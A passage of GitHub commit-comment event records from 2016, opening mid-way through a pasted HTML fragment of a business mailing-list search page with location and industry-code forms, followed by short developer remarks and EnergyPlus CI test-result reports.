value=\"DC\">DC</option><option value=\"FL\">FL</option><option value=\"GA\">GA</option><option value=\"HI\">HI</option><option value=\"ID\">ID</option><option value=\"IL\">IL</option><option value=\"IN\">IN</option><option value=\"IA\">IA</option><option value=\"KS\">KS</option><option value=\"KY\">KY</option><option value=\"LA\">LA</option><option value=\"ME\">ME</option><option value=\"MD\">MD</option><option value=\"MA\">MA</option><option value=\"MI\">MI</option><option value=\"MN\">MN</option><option value=\"MS\">MS</option><option value=\"MO\">MO</option><option value=\"MT\">MT</option><option value=\"NE\">NE</option><option value=\"NV\">NV</option>\r\n                                                                <option value=\"NH\">NH</option><option value=\"NJ\">NJ</option><option value=\"NM\">NM</option>\r\n                                                                <option value=\"NY\">NY</option><option value=\"NC\">NC</option><option value=\"ND\">ND</option><option value=\"OH\">OH</option><option value=\"OK\">OK</option><option value=\"OR\">OR</option><option value=\"PA\">PA</option><option value=\"RI\">RI</option><option value=\"SC\">SC</option><option value=\"SD\">SD</option><option value=\"TN\">TN</option><option value=\"TX\">TX</option><option value=\"UT\">UT</option><option value=\"VT\">VT</option><option value=\"VA\">VA</option><option value=\"WA\">WA</option><option value=\"WV\">WV</option><option value=\"WI\">WI</option><option value=\"WY\">WY</option></select>\r\n                                                        </td>\r\n                                                        <td style=\"padding-left:5px;\">\r\n                                                            <input type=\"button\" name=\"Submit\" value=\"Submit\" class=\"button-find\" onclick=\"submit_business_form('form_city_business','http://173.12.122.137/biz_cart.php?cmd=city_count');\">\r\n                                                        </td>\r\n                                                    </tr>\r\n                                                </tbody></table>\r\n                                            </form>\r\n                                        </div>\r\n\r\n                                        <div id=\"dv_state_business\" class=\"hide\">\r\n                                            <form id=\"form_state_business\" name=\"form_state_business\" method=\"post\" action=\"http://173.12.122.137/biz_cart.php?cmd=state_count\">\r\n\r\n                                                <table align=\"left\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\r\n                                                    <tbody><tr>\r\n                                                        <td>State: </td>\r\n                                                        <td style=\"padding-left:5px;\">\r\n\r\n                                                            <select name=\"state\">\r\n\r\n                                                                <option value=\"AL\">Alabama</option><option value=\"AK\">Alaska</option><option value=\"AZ\">Arizona</option><option value=\"AR\">Arkansas</option><option value=\"CA\">California</option><option value=\"CO\">Colorado</option><option value=\"CT\">Connecticut</option><option value=\"DE\">Delaware</option><option value=\"DC\">District of Columbia</option><option value=\"FL\">Florida</option><option value=\"GA\">Georgia</option><option value=\"HI\">Hawaii</option><option value=\"ID\">Idaho</option><option value=\"IL\">Illinois</option><option value=\"IN\">Indiana</option><option value=\"IA\">Iowa</option><option value=\"KS\">Kansas</option><option value=\"KY\">Kentucky</option><option value=\"LA\">Louisiana</option><option value=\"ME\">Maine</option><option value=\"MD\">Maryland</option><option value=\"MA\">Massachusetts</option><option value=\"MI\">Michigan</option><option value=\"MN\">Minnesota</option><option value=\"MS\">Mississippi</option><option value=\"MO\">Missouri</option><option value=\"MT\">Montana</option><option value=\"NE\">Nebraska</option><option value=\"NV\">Nevada</option><option value=\"NH\">New Hampshire</option><option value=\"NJ\">New Jersey</option><option value=\"NM\">New Mexico</option><option value=\"NY\">New York</option><option value=\"NC\">North Carolina</option><option value=\"ND\">North Dakota</option><option value=\"OH\">Ohio</option><option value=\"OK\">Oklahoma</option><option value=\"OR\">Oregon</option><option value=\"PA\">Pennsylvania</option><option value=\"RI\">Rhode Island</option><option value=\"SC\">South Carolina</option><option value=\"SD\">South Dakota</option><option value=\"TN\">Tennessee</option><option value=\"TX\">Texas</option><option value=\"UT\">Utah</option><option value=\"VT\">Vermont</option><option value=\"VA\">Virginia</option><option value=\"WA\">Washington</option><option value=\"WV\">West Virginia</option><option value=\"WI\">Wisconsin</option><option value=\"WY\">Wyoming</option></select>\r\n\r\n                                                        </td>\r\n                                                        <td style=\"padding-left:5px;\">\r\n                                                            <input type=\"button\" name=\"Submit\" value=\"Submit\" class=\"button-find\" onclick=\"submit_business_form('form_state_business','http://173.12.122.137/biz_cart.php?cmd=state_count');\">\r\n                                                        </td>\r\n                                                    </tr>\r\n\r\n                                                </tbody></table>\r\n                                            </form>\r\n                                        </div>\r\n\r\n                                        <div id=\"dv_counties_business\" class=\"hide\">\r\n                                            <form name=\"form_counties_business\" id=\"form_counties_business\" method=\"post\" action=\"http://173.12.122.137/biz_cart.php?cmd=county_count\">\r\n                                                <table align=\"left\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\r\n                                                    <tbody><tr>\r\n                                                        <td>County: </td>\r\n                                                        <td style=\"padding-left:5px;\">\r\n                                                            <div id=\"inner_counties_business\" style=\"width:125px;\">\r\n                                                                <select class=\"multiselect\" name=\"county[]\"><option value=\"Autauga\">Autauga</option><option value=\"Baldwin\">Baldwin</option><option value=\"Barbour\">Barbour</option><option value=\"Bibb\">Bibb</option><option value=\"Blount\">Blount</option><option value=\"Bullock\">Bullock</option><option value=\"Butler\">Butler</option><option value=\"Calhoun\">Calhoun</option><option value=\"Chambers\">Chambers</option><option value=\"Cherokee\">Cherokee</option><option value=\"Chilton\">Chilton</option><option value=\"Choctaw\">Choctaw</option>\r\n                                                                    <option value=\"Clarke\">Clarke</option><option value=\"Clay\">Clay</option><option value=\"Cleburne\">Cleburne</option><option value=\"Coffee\">Coffee</option><option value=\"Colbert\">Colbert</option><option value=\"Conecuh\">Conecuh</option><option value=\"Coosa\">Coosa</option><option value=\"Covington\">Covington</option><option value=\"Crenshaw\">Crenshaw</option><option value=\"Cullman\">Cullman</option><option value=\"Dale\">Dale</option><option value=\"Dallas\">Dallas</option>\r\n                                                                    <option value=\"De Kalb\">De Kalb</option><option value=\"Elmore\">Elmore</option><option value=\"Escambia\">Escambia</option><option value=\"Etowah\">Etowah</option><option value=\"Fayette\">Fayette</option><option value=\"Franklin\">Franklin</option><option value=\"Geneva\">Geneva</option><option value=\"Greene\">Greene</option><option value=\"Hale\">Hale</option><option value=\"Henry\">Henry</option><option value=\"Houston\">Houston</option><option value=\"Jackson\">Jackson</option><option value=\"Jefferson\">Jefferson</option><option value=\"Lamar\">Lamar</option>\r\n                                                                    <option value=\"Lauderdale\">Lauderdale</option><option value=\"Lawrence\">Lawrence</option><option value=\"Lee\">Lee</option><option value=\"Limestone\">Limestone</option><option value=\"Lowndes\">Lowndes</option><option value=\"Macon\">Macon</option><option value=\"Madison\">Madison</option><option value=\"Marengo\">Marengo</option><option value=\"Marion\">Marion</option><option value=\"Marshall\">Marshall</option><option value=\"Mobile\">Mobile</option>\r\n                                                                    <option value=\"Monroe\">Monroe</option><option value=\"Montgomery\">Montgomery</option><option value=\"Morgan\">Morgan</option><option value=\"Perry\">Perry</option><option value=\"Pickens\">Pickens</option><option value=\"Pike\">Pike</option><option value=\"Randolph\">Randolph</option><option value=\"Russell\">Russell</option><option value=\"Saint Clair\">Saint Clair</option><option value=\"Shelby\">Shelby</option><option value=\"Sumter\">Sumter</option><option value=\"Talladega\">Talladega</option><option value=\"Tallapoosa\">Tallapoosa</option><option value=\"Tuscaloosa\">Tuscaloosa</option><option value=\"Walker\">Walker</option><option value=\"Washington\">Washington</option><option value=\"Wilcox\">Wilcox</option><option value=\"Winston\">Winston</option></select>\r\n                                                            </div>\r\n                                                        </td>\r\n                                                        <td valign=\"top\">\r\n                                                            <select name=\"state\" onchange=\"loadCounties_business(this.value);\"><option value=\"AL\">AL</option><option value=\"AK\">AK</option><option value=\"AZ\">AZ</option><option value=\"AR\">AR</option><option value=\"CA\">CA</option><option value=\"CO\">CO</option><option value=\"CT\">CT</option><option value=\"DE\">DE</option><option value=\"DC\">DC</option><option value=\"FL\">FL</option><option value=\"GA\">GA</option><option value=\"HI\">HI</option><option value=\"ID\">ID</option><option value=\"IL\">IL</option><option value=\"IN\">IN</option><option value=\"IA\">IA</option><option value=\"KS\">KS</option><option value=\"KY\">KY</option><option value=\"LA\">LA</option><option value=\"ME\">ME</option><option value=\"MD\">MD</option><option value=\"MA\">MA</option><option value=\"MI\">MI</option><option value=\"MN\">MN</option><option value=\"MS\">MS</option><option value=\"MO\">MO</option><option value=\"MT\">MT</option><option value=\"NE\">NE</option><option value=\"NV\">NV</option>\r\n                                                                <option value=\"NH\">NH</option><option value=\"NJ\">NJ</option><option value=\"NM\">NM</option>\r\n                                                                <option value=\"NY\">NY</option><option value=\"NC\">NC</option><option value=\"ND\">ND</option><option value=\"OH\">OH</option><option value=\"OK\">OK</option><option value=\"OR\">OR</option><option value=\"PA\">PA</option><option value=\"RI\">RI</option><option value=\"SC\">SC</option><option value=\"SD\">SD</option><option value=\"TN\">TN</option><option value=\"TX\">TX</option><option value=\"UT\">UT</option><option value=\"VT\">VT</option><option value=\"VA\">VA</option><option value=\"WA\">WA</option><option value=\"WV\">WV</option><option value=\"WI\">WI</option><option value=\"WY\">WY</option></select>\r\n                                                        </td>\r\n                                                        <td style=\"padding-left:5px;\">\r\n                                                            <input type=\"button\" name=\"Submit\" value=\"Submit\" class=\"button-find\" onclick=\"submit_business_form('form_counties_business','http://173.12.122.137/biz_cart.php?cmd=county_count');\">\r\n                                                        </td>\r\n                                                    </tr>\r\n                                                </tbody></table>\r\n                                            </form>\r\n\r\n                                        </div>\r\n\r\n                                        <div id=\"dv_zip_business\" class=\"hide\">\r\n                                            <form id=\"form_zip_business\" name=\"form_zip_business\" method=\"post\" action=\"http://173.12.122.137/biz_cart.php?cmd=zip_radius_count\">\r\n                                                <table width=\"100%\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\r\n                                                    <tbody><tr>\r\n                                                        <td valign=\"middle\">Zip: </td>\r\n                                                        <td style=\"padding-left:5px;\" valign=\"middle\">\r\n                                                            <div style=\"float:left\">\r\n                                                                <input name=\"zip\" type=\"text\" size=\"10\" style=\"width:50px;\">\r\n                                                            </div>\r\n                                                            <div style=\"float:left; margin-left:9px; margin-top:6px;\">\r\n                                                                Within:\r\n                                                            </div>\r\n                                                            <div style=\"float:left; margin-left:9px;\">\r\n                                                                <select name=\"miles\" style=\"width:90px;\">\r\n                                                                    <option value=\"1\">1 mile</option>\r\n                                                                    <option value=\"2\">2 miles</option>\r\n                                                                    <option value=\"3\">3 miles</option>\r\n                                                                    <option value=\"4\">4 miles</option>\r\n\r\n                                                                    <option value=\"5\">5 miles</option>\r\n                                                                    <option value=\"6\">6 miles</option>\r\n                                                                    <option value=\"7\">7 miles</option>\r\n                                                                    <option value=\"8\">8 miles</option>\r\n                                                                    <option value=\"9\">9 miles</option>\r\n                                                                    <option value=\"10\">10 miles</option>\r\n                                                                    <option value=\"11\">11 miles</option>\r\n                                                                    <option value=\"12\">12 miles</option>\r\n                                                                    <option value=\"13\">13 miles</option>\r\n\r\n                                                                    <option value=\"14\">14 miles</option>\r\n                                                                    <option value=\"15\">15 miles</option>\r\n                                                                    <option value=\"16\">16 miles</option>\r\n                                                                    <option value=\"17\">17 miles</option>\r\n                                                                    <option value=\"18\">18 miles</option>\r\n                                                                    <option value=\"19\">19 miles</option>\r\n                                                                    <option value=\"20\">20 miles</option>\r\n                                                                    <option value=\"30\">30 miles</option>\r\n                                                                    <option value=\"40\">40 miles</option>\r\n\r\n                                                                    <option value=\"50\">50 miles</option>\r\n                                                                    <option value=\"75\">75 miles</option>\r\n                                                                    <option value=\"100\">100 miles</option>\r\n                                                                    <option value=\"125\">125 miles</option>\r\n                                                                    <option value=\"150\">150 miles</option>\r\n                                                                    <option value=\"175\">175 miles</option>\r\n                                                                    <option value=\"200\">200 miles</option>\r\n                                                                </select>\r\n                                                            </div>\r\n                                                            <div class=\"clear\"></div>\r\n                                                        </td>\r\n                                                        <td style=\"padding-left:5px;\">\r\n                                                            <input type=\"button\" name=\"Submit\" value=\"Submit\" class=\"button-find\" onclick=\"submit_business_form('form_zip_business','http://173.12.122.137/biz_cart.php?cmd=zip_radius_count');\">\r\n                                                        </td>\r\n                                                    </tr>\r\n\r\n                                                </tbody></table>\r\n                                            </form>\r\n                                        </div>\r\n\r\n                                        <div id=\"dv_multiple_zip_business\" class=\"hide\">\r\n                                            <form id=\"form_multiple_zip_business\" name=\"form_multiple_zip_business\" method=\"post\" action=\"http://173.12.122.137/demo2.php\">\r\n                                                <table border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\r\n                                                    <tbody><tr>\r\n                                                        <td valign=\"middle\" align=\"right\">Example:</td>\r\n                                                        <td valign=\"middle\" align=\"left\"> 33020, 33069, 33024</td>\r\n                                                    </tr>\r\n                                                    <tr>\r\n                                                        <td valign=\"middle\">Multiple Zip Codes:</td>\r\n\r\n                                                        <td valign=\"middle\"><input name=\"zip\" type=\"text\" size=\"30\"></td>\r\n                                                    </tr>\r\n                                                    <tr>\r\n                                                        <td>&nbsp;</td>\r\n                                                        <td style=\"padding-top:3px;\"><input type=\"button\" name=\"Submit\" value=\"Submit\" class=\"button-find\" onclick=\"submit_business_form('form_multiple_zip','http://173.12.122.137/demo2.php');\"></td>\r\n                                                    </tr>\r\n                                                </tbody></table>\r\n                                            </form>\r\n                                        </div>\r\n                                        <div id=\"dv_entire_usa_business\" class=\"hide\">\r\n                                            <form id=\"form_entire_usa_business\" name=\"form_multiple_zip_business\" method=\"post\" action=\"http://173.12.122.137/biz_cart.php?cmd=entire_usa_count\">\r\n                                                <table border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\r\n                                                    <tbody><tr>\r\n                                                        <td>Entire USA:</td>\r\n                                                        <td style=\"padding-left:5px;\"><input type=\"button\" name=\"Submit\" value=\"Submit\" class=\"button-find\" onclick=\"submit_business_form('form_entire_usa_business','http://173.12.122.137/biz_cart.php?cmd=entire_usa_count');\"></td>\r\n                                                    </tr>\r\n                                                </tbody></table>\r\n                                            </form>\r\n                                        </div>\r\n                                        <div class=\"clear\"></div>\r\n                                        <div style=\"display:block; clear:left\">\r\n                                            <table align=\"left\" style=\"display:table; text-align:left; width:360px; margin-top:5px;\" border=\"0\">\r\n                                                <tbody>\r\n\r\n                                                <tr>\r\n                                                    <td valign=\"bottom\"><input style=\"margin-bottom:0px\" id=\"city_radio_business\" name=\"consumer_search_business\" value=\"1\" onclick=\"showLocations_business();\" type=\"radio\" checked=\"checked\"><label for=\"city_radio_business\">City</label>&nbsp;&nbsp;</td>\r\n                                                    <td valign=\"bottom\"><input style=\"margin-bottom:0px\" id=\"state_radio_business\" name=\"consumer_search_business\" value=\"2\" onclick=\"showLocations_business();\" type=\"radio\"><label for=\"state_radio_business\">State</label>&nbsp;&nbsp;</td>\r\n                                                    <td valign=\"bottom\"><input style=\"margin-bottom:0px\" id=\"county_radio_business\" name=\"consumer_search_business\" value=\"3\" onclick=\"showLocations_business();\" type=\"radio\"><label for=\"county_radio_business\">County</label>&nbsp;&nbsp;</td>\r\n                                                    <td valign=\"bottom\"><input style=\"margin-bottom:0px\" id=\"zip_radio_business\" name=\"consumer_search_business\" value=\"4\" onclick=\"showLocations_business();\" type=\"radio\"><label for=\"zip_radio_business\">Zip</label>&nbsp;&nbsp;</td>\r\n                                                    <td valign=\"bottom\"><input style=\"margin-bottom:0px\" id=\"entire_usa_radio_business\" name=\"consumer_search_business\" value=\"5\" onclick=\"showLocations_business();\" type=\"radio\"><label for=\"entire_usa_radio_business\">Entire USA</label>&nbsp;&nbsp;</td>\r\n\r\n                                                </tr>\r\n                                                </tbody>\r\n                                            </table>\r\n                                        </div>\r\n                                        <div class=\"clear\"></div>\r\n                                        <!-- tab 1 data ends here -->\r\n                                        <!-- Business Geo Ends -->\r\n                                    </div>\r\n                                </div>\r\n\r\n                                <!-- Business -->\r\n                                <div style=\"width:360px; margin:10px;background-color:#ffffff; border:solid 1px #fe8510\" class=\"ui-corner-all\">\r\n                                    <div style=\"margin:5px; text-align:left\">\r\n                                        <span onclick=\"$('#dv_business_sic').toggle();\" style=\"cursor:pointer; font-weight:bold\">SIC Codes</span>                                    </div>\r\n                                    <div id=\"dv_business_sic\" style=\"margin:5px; text-align:left; display:table;\">\r\n                                        Enter SIC Codes to Find Specific Businesses\r\n                                        <br>\r\n                                        <br>\r\n                                        SIC Code Lookup: <a id=\"open_sic_dialog\" href=\"#\">Catalog</a>\r\n                                        <br><br>\r\n                                        <form name=\"form_sic_business\" id=\"form_sic_business\" method=\"post\" action=\"http://173.12.122.137/biz_cart.php?cmd=sic_array_count\">\r\n                                            <table align=\"left\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\r\n                                                <tbody><tr>\r\n                                                    <td colspan=\"2\">\r\n                                                        <div id=\"sic_input_boxes\">\r\n                                                            <div style=\"float:left; margin:5px;\"><input type=\"text\" name=\"sic_code[]\" size=\"5\" value=\"\"></div>\r\n                                                            <div style=\"float:left; margin:5px;\"><input type=\"text\" name=\"sic_code[]\" size=\"5\" value=\"\"></div>\r\n                                                            <div style=\"float:left; margin:5px;\"><input type=\"text\" name=\"sic_code[]\" size=\"5\" value=\"\"></div>\r\n                                                            <div style=\"float:left; margin:5px;\"><input type=\"text\" name=\"sic_code[]\" size=\"5\" value=\"\"></div>\r\n                                                            <div style=\"float:left; margin:5px;\"><input type=\"text\" name=\"sic_code[]\" size=\"5\" value=\"\"></div>\r\n                                                            <div style=\"float:left; margin:5px;\"><input type=\"text\" name=\"sic_code[]\" size=\"5\" value=\"\"></div>\r\n                                                            <div style=\"float:left; margin:5px;\"><input type=\"text\" name=\"sic_code[]\" size=\"5\" value=\"\"></div>\r\n                                                            <div style=\"float:left; margin:5px;\"><input type=\"text\" name=\"sic_code[]\" size=\"5\" value=\"\"></div>\r\n                                                            <div style=\"float:left; margin:5px;\"><input type=\"text\" name=\"sic_code[]\" size=\"5\" value=\"\"></div>\r\n                                                            <div style=\"float:left; margin:5px;\"><input type=\"text\" name=\"sic_code[]\" size=\"5\" value=\"\"></div>\r\n                                                            <div style=\"float:left; margin:5px;\"><input type=\"text\" name=\"sic_code[]\" size=\"5\" value=\"\"></div>\r\n                                                            <div style=\"float:left; margin:5px;\"><input type=\"text\" name=\"sic_code[]\" size=\"5\" value=\"\"></div>\r\n\r\n                                                        </div>\r\n                                                        <div style=\"clear:both\">&nbsp;</div>\r\n                                                    </td>\r\n                                                </tr>\r\n                                                <tr>\r\n                                                    <td style=\"padding-left:5px\"><a href=\"javascript:;\" onclick=\"add_more_sic()\">Add More</a></td>\r\n                                                    <td style=\"padding-top:3px;\"><input type=\"button\" name=\"Submit\" value=\"Submit\" class=\"button-find\" onclick=\"submit_business_form(current_business_form,'http://173.12.122.137/biz_cart.php?cmd='+current_business_cmd);\"></td>\r\n                                                </tr>\r\n                                            </tbody></table>\r\n                                        </form>\r\n                                    </div>\r\n                                </div>\r\n\r\n\r\n                                <div style=\"width:360px; margin:10px;background-color:#ffffff; border:solid 1px #fe8510\" class=\"ui-corner-all\">\r\n                                    <div style=\"margin:5px; text-align:left\">\r\n                                        <span onclick=\"$('#dv_business_naics').toggle();\" style=\"cursor:pointer; font-weight:bold\">NAICS Codes</span>\r\n                                    </div>\r\n                                    <div id=\"dv_business_naics\" style=\"margin:5px; text-align:left; display:table;\">\r\n                                        Enter NAICS Codes to Find Specific Businesses\r\n                                        <br>\r\n                                        <br>\r\n                                        NAICS Code Lookup: <a id=\"open_naics_dialog\" href=\"#\">Catalog</a>\r\n                                        <br><br>\r\n                                        <form name=\"form_naics_business\" id=\"form_naics_business\" method=\"post\" action=\"http://173.12.122.137/biz_cart.php?cmd=naics_array_count\">\r\n                                            <table align=\"left\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\r\n                                                <tbody><tr>\r\n                                                    <td colspan=\"2\">\r\n                                                        <div id=\"naics_input_boxes\">\r\n                                                            <div style=\"float:left; margin:5px;\"><input type=\"text\" name=\"naics_code[]\" size=\"5\" value=\"\"></div>\r\n                                                            <div style=\"float:left; margin:5px;\"><input type=\"text\" name=\"naics_code[]\" size=\"5\" value=\"\"></div>\r\n                                                            <div style=\"float:left; margin:5px;\"><input type=\"text\" name=\"naics_code[]\" size=\"5\" value=\"\"></div>\r\n                                                            <div style=\"float:left; margin:5px;\"><input type=\"text\" name=\"naics_code[]\" size=\"5\" value=\"\"></div>\r\n                                                            <div style=\"float:left; margin:5px;\"><input type=\"text\" name=\"naics_code[]\" size=\"5\" value=\"\"></div>\r\n                                                            <div style=\"float:left; margin:5px;\"><input type=\"text\" name=\"naics_code[]\" size=\"5\" value=\"\"></div>\r\n                                                            <div style=\"float:left; margin:5px;\"><input type=\"text\" name=\"naics_code[]\" size=\"5\" value=\"\"></div>\r\n                                                            <div style=\"float:left; margin:5px;\"><input type=\"text\" name=\"naics_code[]\" size=\"5\" value=\"\"></div>\r\n                                                            <div style=\"float:left; margin:5px;\"><input type=\"text\" name=\"naics_code[]\" size=\"5\" value=\"\"></div>\r\n                                                            <div style=\"float:left; margin:5px;\"><input type=\"text\" name=\"naics_code[]\" size=\"5\" value=\"\"></div>\r\n                                                            <div style=\"float:left; margin:5px;\"><input type=\"text\" name=\"naics_code[]\" size=\"5\" value=\"\"></div>\r\n                                                            <div style=\"float:left; margin:5px;\"><input type=\"text\" name=\"naics_code[]\" size=\"5\" value=\"\"></div>\r\n\r\n                                                        </div>\r\n                                                        <div style=\"clear:both\">&nbsp;</div>\r\n                                                    </td>\r\n                                                </tr>\r\n                                                <tr>\r\n                                                    <td style=\"padding-left:5px\"><a href=\"javascript:;\" onclick=\"add_more_naics()\">Add More</a></td>\r\n                                                    <td style=\"padding-top:3px;\"><input type=\"button\" name=\"Submit\" value=\"Submit\" class=\"button-find\" onclick=\"submit_business_form(current_business_form,'http://173.12.122.137/biz_cart.php?cmd='+current_business_cmd);\"></td>\r\n                                                </tr>\r\n                                            </tbody></table>\r\n                                        </form>\r\n                                    </div>\r\n                                </div>\r\n\r\n                                <div style=\"width:360px; margin:10px;background-color:#ffffff; border:solid 1px #fe8510\" class=\"ui-corner-all\">\r\n                                    <div style=\"margin:5px; text-align:left\">\r\n                                        <span onclick=\"$('#dv_business_titles').toggle();\" style=\"cursor:pointer; font-weight:bold\">Titles</span>\r\n                                    </div>\r\n                                    <div id=\"dv_business_titles\" style=\"margin:5px; text-align:left; display:table;\">\r\n                                        Select desired titles from our catalog <br><br>\r\n                                        Titles Lookup: <a class=\"open_titles_dialog\" href=\"#\">Catalog</a>\r\n                                        <br><br>\r\n                                        <form name=\"form_titles_business\" id=\"form_titles_business\" method=\"post\" action=\"http://173.12.122.137/biz_cart.php?cmd=titles_array_count\">\r\n                                            <table align=\"left\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" style=\"width:340px;\">\r\n                                                <tbody><tr>\r\n                                                    <td colspan=\"2\">\r\n                                                        <div id=\"titles_input_boxes\">\r\n\r\n                                                        </div>\r\n                                                        <div style=\"clear:both\">&nbsp;</div>\r\n                                                    </td>\r\n                                                </tr>\r\n                                                <tr>\r\n                                                    <td style=\"padding-left:5px\"><a class=\"open_titles_dialog\" href=\"#\">Add More</a></td>\r\n                                                    <td style=\"padding-top:3px;\"><input type=\"button\" name=\"Submit\" value=\"Submit\" class=\"button-find\" onclick=\"submit_business_form(current_business_form,'http://173.12.122.137/biz_cart.php?cmd='+current_business_cmd);\"></td>\r\n                                                </tr>\r\n                                                <tr><td>* Title Filter is an additional $249</td></tr>\r\n                                            </tbody></table>\r\n                                        </form>\r\n                                    </div>\r\n                                </div>``"}},"created_at":"2016-09-01T19:59:33Z"}
{"id":"4504772995","type":"CommitCommentEvent","actor":{"login":"haypo"},"repo":{"name":"haypo/perf"},"payload":{"comment":{"id":18869739,"position":44,"line":97,"path":"perf/text_runner.py","commit_id":"b2b0067fe45f3c5037d8fcd95d23c9d2afa38b31","created_at":"2016-09-01T19:59:40Z","updated_at":"2016-09-01T19:59:40Z","body":"Hum, I'm always surprised to get a comment on a commit. It's something new for me, especially for an \"old\" commit. Why not opening an issue? It would be more visible.\r\n\r\nI don't know well Cython, so I don't know how child processes should be spawned, but I'm open to contributions. I added python_implementation(). Does Cython return \"cpython\" or \"cython\"? Maybe we can use a different value on Cython?"}},"created_at":"2016-09-01T19:59:40Z"}
{"id":"4504773463","type":"CommitCommentEvent","actor":{"login":"setriplette"},"repo":{"name":"ebeshero/DHClass-Hub"},"payload":{"comment":{"id":18869741,"position":null,"line":null,"path":null,"commit_id":"596ca7e363581ea6e76f0d97db2bc8e1ff673285","created_at":"2016-09-01T19:59:46Z","updated_at":"2016-09-01T19:59:46Z","body":"Adorable! Is this your cat Lauren? Cow kitty!"}},"created_at":"2016-09-01T19:59:46Z"}
{"id":"4500027807","type":"CommitCommentEvent","actor":{"login":"jinsup008"},"repo":{"name":"jinsup008/TestProject"},"payload":{"comment":{"id":18856812,"position":null,"line":null,"path":null,"commit_id":"c706274fec2961f88f13a1bcfac70a23acf19356","created_at":"2016-09-01T02:00:15Z","updated_at":"2016-09-01T02:00:15Z","body":"commit"}},"created_at":"2016-09-01T02:00:15Z"}
{"id":"4500029267","type":"CommitCommentEvent","actor":{"login":"Jetski5822"},"repo":{"name":"OrchardCMS/Orchard2"},"payload":{"comment":{"id":18856821,"position":null,"line":null,"path":null,"commit_id":"9881ff8c8400bd09117e4a5f60b94587835b0c23","created_at":"2016-09-01T02:00:42Z","updated_at":"2016-09-01T02:00:42Z","body":"Good work Seb"}},"created_at":"2016-09-01T02:00:42Z"}
{"id":"4500030918","type":"CommitCommentEvent","actor":{"login":"mcarltzu"},"repo":{"name":"jjethwa/rundeck"},"payload":{"comment":{"id":18856830,"position":null,"line":null,"path":null,"commit_id":"3358ff8e43429a634d619123a2c26aaaacb20e5e","created_at":"2016-09-01T02:01:20Z","updated_at":"2016-09-01T02:01:20Z","body":"HI @jjethwa \r\n\r\nOhh I see. Haha thanks for the info. I cloned your repo by the way. Thank you :smiley: "}},"created_at":"2016-09-01T02:01:20Z"}
{"id":"4500031142","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18856831,"position":null,"line":null,"path":null,"commit_id":"21e878b3ae76dbf54b651250f5230f4ac7a229b3","created_at":"2016-09-01T02:01:25Z","updated_at":"2016-09-01T02:01:25Z","body":"5626-Plant-HX-min-DT (EnergyArchmage) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1187 of 1187 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-21e878b3ae76dbf54b651250f5230f4ac7a229b3-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-21e878b3ae76dbf54b651250f5230f4ac7a229b3-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-21e878b3ae76dbf54b651250f5230f4ac7a229b3-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-35.99%25-green.svg)</a>\n"}},"created_at":"2016-09-01T02:01:25Z"}
{"id":"4500033757","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18856836,"position":null,"line":null,"path":null,"commit_id":"21e878b3ae76dbf54b651250f5230f4ac7a229b3","created_at":"2016-09-01T02:02:21Z","updated_at":"2016-09-01T02:02:21Z","body":"5626-Plant-HX-min-DT (EnergyArchmage) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-21e878b3ae76dbf54b651250f5230f4ac7a229b3-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-01T02:02:21Z"}
{"id":"4500034628","type":"CommitCommentEvent","actor":{"login":"songjinzhong"},"repo":{"name":"1exciting/BD_FET"},"payload":{"comment":{"id":18856838,"position":68,"line":68,"path":"stage2/task15/bao/index.html","commit_id":"72b95c96b889558db5e73bf12e2eed7421051632","created_at":"2016-09-01T02:02:42Z","updated_at":"2016-09-01T02:02:42Z","body":".."}},"created_at":"2016-09-01T02:02:42Z"}
{"id":"4500035352","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18856841,"position":null,"line":null,"path":null,"commit_id":"34cf667ef26cea90003b336fbb2fbf9e2580bbee","created_at":"2016-09-01T02:02:57Z","updated_at":"2016-09-01T02:02:57Z","body":"113835831-Source-Temp-Not-Reporting (mjwitte) - i386-Windows-7-VisualStudio-12: OK (2332 of 2333 tests passed, 24 test warnings)\n\n * 25 tests had: AUD diffs.\n * 25 tests had: RDD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-34cf667ef26cea90003b336fbb2fbf9e2580bbee-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-34cf667ef26cea90003b336fbb2fbf9e2580bbee-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-01T02:02:57Z"}
